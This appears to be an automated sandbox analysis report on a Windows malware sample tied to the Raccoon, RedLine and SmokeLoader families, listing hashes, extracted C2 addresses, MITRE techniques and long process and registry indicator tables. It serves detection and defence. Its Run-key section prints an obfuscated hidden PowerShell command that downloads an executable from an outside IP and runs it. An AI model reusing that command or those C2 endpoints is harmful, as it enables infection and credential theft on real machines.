raccoon | e43b2359f27dde4a5f8de4483f9db4016bdf1d2dd0a93ebdbc6c599b3bcbf889

Analysis

max time kernel
151s
max time network
152s
platform
windows10_x64
resource
win10v20210408
submitted
12-08-2021 00:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2c30e7340666a2b59ee88f5250ab50e5.exe
Size

319KB
MD5

2c30e7340666a2b59ee88f5250ab50e5
SHA1

2a9c301e0c7696130d997e7e1e063388155377e6
SHA256

e43b2359f27dde4a5f8de4483f9db4016bdf1d2dd0a93ebdbc6c599b3bcbf889
SHA512

585aef33960f7942729461e78c6d80e4867e9c724667a9ad884034fb4694e21730b5e304f8c9ab8ad38c6baa00a49201a2b8f4988481d52cb2929d9def55450e

Score

10^/10

raccoon redline smokeloader 2ca2376c561d1af7f8b9e6f3256b06220a3db187 471c70de3b4f9e4d493e418d1f60a90659057de0 @gasfer_dark cd8dc1031358b1aec55cc6bc447df1018b068607 backdoor discovery evasion infostealer persistence spyware stealer suricata themida trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://91.241.19.52/Api/GetFile2

Extracted

Family

smokeloader

Version

2020

http://readinglistforjuly1.xyz/

http://readinglistforjuly2.xyz/

http://readinglistforjuly3.xyz/

http://readinglistforjuly4.xyz/

http://readinglistforjuly5.xyz/

http://readinglistforjuly6.xyz/

http://readinglistforjuly7.xyz/

http://readinglistforjuly8.xyz/

http://readinglistforjuly9.xyz/

http://readinglistforjuly10.xyz/

http://readinglistforjuly1.site/

http://readinglistforjuly2.site/

http://readinglistforjuly3.site/

http://readinglistforjuly4.site/

http://readinglistforjuly5.site/

http://readinglistforjuly6.site/

http://readinglistforjuly7.site/

http://readinglistforjuly8.site/

http://readinglistforjuly9.site/

http://readinglistforjuly10.site/

rc4.i32

Extracted

Family

raccoon

Botnet

2ca2376c561d1af7f8b9e6f3256b06220a3db187

Attributes

url4cnc
https://telete.in/johnyes13

rc4.plain

Extracted

Family

redline

Botnet

@gasfer_dark

207.154.240.76:80

Extracted

Family

raccoon

Botnet

cd8dc1031358b1aec55cc6bc447df1018b068607

Attributes

url4cnc
https://telete.in/jagressor_kz

rc4.plain

Extracted

Family

raccoon

Botnet

471c70de3b4f9e4d493e418d1f60a90659057de0

Attributes

url4cnc
https://telete.in/p1rosto100xx

rc4.plain

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Process spawned unexpected child process 8 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4392	4540	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4416	4540	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4484	4540	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4648	4540	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4664	4540	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4492	4540	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4740	4540	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4496	4540	schtasks.exe

Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon

Raccoon Stealer Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3644-177-0x0000000000400000-0x0000000002CB1000-memory.dmp	family_raccoon
behavioral2/memory/2716-201-0x0000000000400000-0x0000000000946000-memory.dmp	family_raccoon
behavioral2/memory/5108-373-0x0000000000400000-0x0000000000495000-memory.dmp	family_raccoon

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 4 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\8CD5.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\8CD5.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\A63E.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\A63E.exe	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 1800 created 3644 1800 WerFault.exe 9B8E.exe
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

37 4352 powershell.exe
Downloads MZ/PE file

description	pid	process	target process
PID 1800 created 3644	1800	WerFault.exe	9B8E.exe

flow	pid	process
37	4352	powershell.exe

Executes dropped EXE 62 IoCs

Processes:

837E.exe837E.tmp8CD5.exe837E.exe837E.tmp914B.exe9738.exefsucenter.exeRuntimebroker.exe9B8E.exe9E9C.exeA63E.exeAB50.exe9738.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeHostData.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeAB50.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeinstall.exeDatabase.exewininit.exeDatabase.exeDatabase.exeAB50.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

pid	process
3668	837E.exe
2988	837E.tmp
3760	8CD5.exe
3288	837E.exe
2336	837E.tmp
1584	914B.exe
2544	9738.exe
1792	fsucenter.exe
1832	Runtimebroker.exe
3644	9B8E.exe
2716	9E9C.exe
1588	A63E.exe
3020	AB50.exe
5108	9738.exe
3016	Database.exe
4232	Database.exe
2636	Database.exe
3288	install.exe
2284	HostData.exe
3196	Database.exe
4272	Database.exe
4332	Database.exe
4492	Database.exe
2276	Database.exe
4828	Database.exe
4812	AB50.exe
4924	Database.exe
4972	Database.exe
4724	Database.exe
4804	Database.exe
4712	Database.exe
5024	Database.exe
5052	Database.exe
5060	Database.exe
1876	Database.exe
3156	Database.exe
2380	Database.exe
1104	Database.exe
5104	Database.exe
4212	Database.exe
4140	Database.exe
4448	Database.exe
4932	Database.exe
2288	Database.exe
1480	Database.exe
788	Database.exe
1856	Database.exe
4460	install.exe
4456	Database.exe
4896	wininit.exe
4692	Database.exe
4952	Database.exe
4116	AB50.exe
4216	Database.exe
4724	Database.exe
4688	Database.exe
4704	Database.exe
4996	Database.exe
5036	Database.exe
5056	Database.exe
5072	Database.exe
5060	Database.exe

Checks BIOS information in registry 2 TTPs 64 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe8CD5.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	8CD5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	8CD5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Database.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Database.exe

Deletes itself 1 IoCs

Processes:

pid process

3024
Drops startup file 1 IoCs

Processes:

Runtimebroker.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk Runtimebroker.exe
Loads dropped DLL 6 IoCs

Processes:

fsucenter.exe9E9C.exe

pid process

1792 fsucenter.exe
2716 9E9C.exe
2716 9E9C.exe
2716 9E9C.exe
2716 9E9C.exe
2716 9E9C.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3024

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound device.lnk	Runtimebroker.exe

pid	process
1792	fsucenter.exe
2716	9E9C.exe
2716	9E9C.exe
2716	9E9C.exe
2716	9E9C.exe
2716	9E9C.exe

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\8CD5.exe	themida
C:\Users\Admin\AppData\Local\Temp\8CD5.exe	themida
behavioral2/memory/3760-145-0x0000000000C30000-0x0000000000C31000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

powershell.exeinstall.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sound device = "Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile(('http://91.241.19.52/Ru'+'nti'+'m'+'ebr'+'oke'+'r.exe'),($env:TEMP+'\\Vp'+'nm.e'+'xe'));Start-Process ($env:TEMP+'\\V'+'pn'+'m.exe')"	powershell.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Users\\Public\\Videos\\wininit.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SearchUI = "\"C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\Cortana.UI\\SearchUI.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Windows\\System32\\usp10\\taskhostw.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\All Users\\regid.1991-06.com.microsoft\\conhost.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\twain_32\\explorer.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\install = "\"C:\\ProgramData\\Data\\GPU\\install.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\SearchUI = "\"C:\\Windows\\SystemApps\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\WindowsPhoneReservedAppInfo\\SearchUI.exe\""	install.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WmiPrvSE = "\"C:\\Windows\\System32\\wbem\\OfflineFilesConfigurationWmiProvider\\WmiPrvSE.exe\""	install.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 43 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Database.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe8CD5.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	8CD5.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Database.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 4 IoCs

Processes:

install.exe

description	ioc	process
File created	C:\Windows\SysWOW64\usp10\taskhostw.exe	install.exe
File created	C:\Windows\SysWOW64\usp10\ea9f0e6c9e2dcd4dfacdaf29ba21541fb815a988	install.exe
File created	C:\Windows\SysWOW64\wbem\OfflineFilesConfigurationWmiProvider\WmiPrvSE.exe	install.exe
File created	C:\Windows\SysWOW64\wbem\OfflineFilesConfigurationWmiProvider\24dbde2999530ef5fd907494bc374d663924116c	install.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

Processes:

8CD5.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exeDatabase.exe

pid	process
3760	8CD5.exe
3016	Database.exe
3016	Database.exe
3016	Database.exe
4232	Database.exe
4232	Database.exe
4232	Database.exe
2636	Database.exe
2636	Database.exe
2636	Database.exe
3196	Database.exe
3196	Database.exe
3196	Database.exe
4272	Database.exe
4272	Database.exe
4272	Database.exe
4332	Database.exe
4332	Database.exe
4332	Database.exe
4492	Database.exe
4492	Database.exe
4492	Database.exe
2276	Database.exe
2276	Database.exe
2276	Database.exe
4828	Database.exe
4828	Database.exe
4828	Database.exe
4924	Database.exe
4924	Database.exe
4924	Database.exe
4972	Database.exe
4972	Database.exe
4972	Database.exe
4724	Database.exe
4724	Database.exe
4724	Database.exe
4804	Database.exe
4804	Database.exe
4804	Database.exe
4712	Database.exe
4712	Database.exe
4712	Database.exe
5024	Database.exe
5024	Database.exe
5024	Database.exe
5052	Database.exe
5052	Database.exe
5052	Database.exe
5060	Database.exe
5060	Database.exe
5060	Database.exe
1876	Database.exe
1876	Database.exe
1876	Database.exe
3156	Database.exe
3156	Database.exe
3156	Database.exe
2380	Database.exe
2380	Database.exe
2380	Database.exe
1104	Database.exe
1104	Database.exe
1104	Database.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

2c30e7340666a2b59ee88f5250ab50e5.exe9738.exeAB50.exeinstall.exe

description	pid	process	target process
PID 3628 set thread context of 2496	3628	2c30e7340666a2b59ee88f5250ab50e5.exe	2c30e7340666a2b59ee88f5250ab50e5.exe
PID 2544 set thread context of 5108	2544	9738.exe	9738.exe
PID 3020 set thread context of 4812	3020	AB50.exe	AB50.exe
PID 3288 set thread context of 4460	3288	install.exe	install.exe

Drops file in Windows directory 6 IoCs

Processes:

install.exe

description	ioc	process
File created	C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\WindowsPhoneReservedAppInfo\dab4d89cac03ec27dbe47b361df763dc3f848f6c	install.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.UI\SearchUI.exe	install.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.UI\dab4d89cac03ec27dbe47b361df763dc3f848f6c	install.exe
File created	C:\Windows\twain_32\explorer.exe	install.exe
File created	C:\Windows\twain_32\7a0fd90576e08807bde2cc57bcf9854bbce05fe3	install.exe
File created	C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\WindowsPhoneReservedAppInfo\SearchUI.exe	install.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
3464	3644	WerFault.exe	9B8E.exe
1820	3644	WerFault.exe	9B8E.exe
2132	3644	WerFault.exe	9B8E.exe
1796	3644	WerFault.exe	9B8E.exe
1800	3644	WerFault.exe	9B8E.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

2c30e7340666a2b59ee88f5250ab50e5.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2c30e7340666a2b59ee88f5250ab50e5.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2c30e7340666a2b59ee88f5250ab50e5.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	2c30e7340666a2b59ee88f5250ab50e5.exe

Creates scheduled task(s) 1 TTPs 8 IoCs
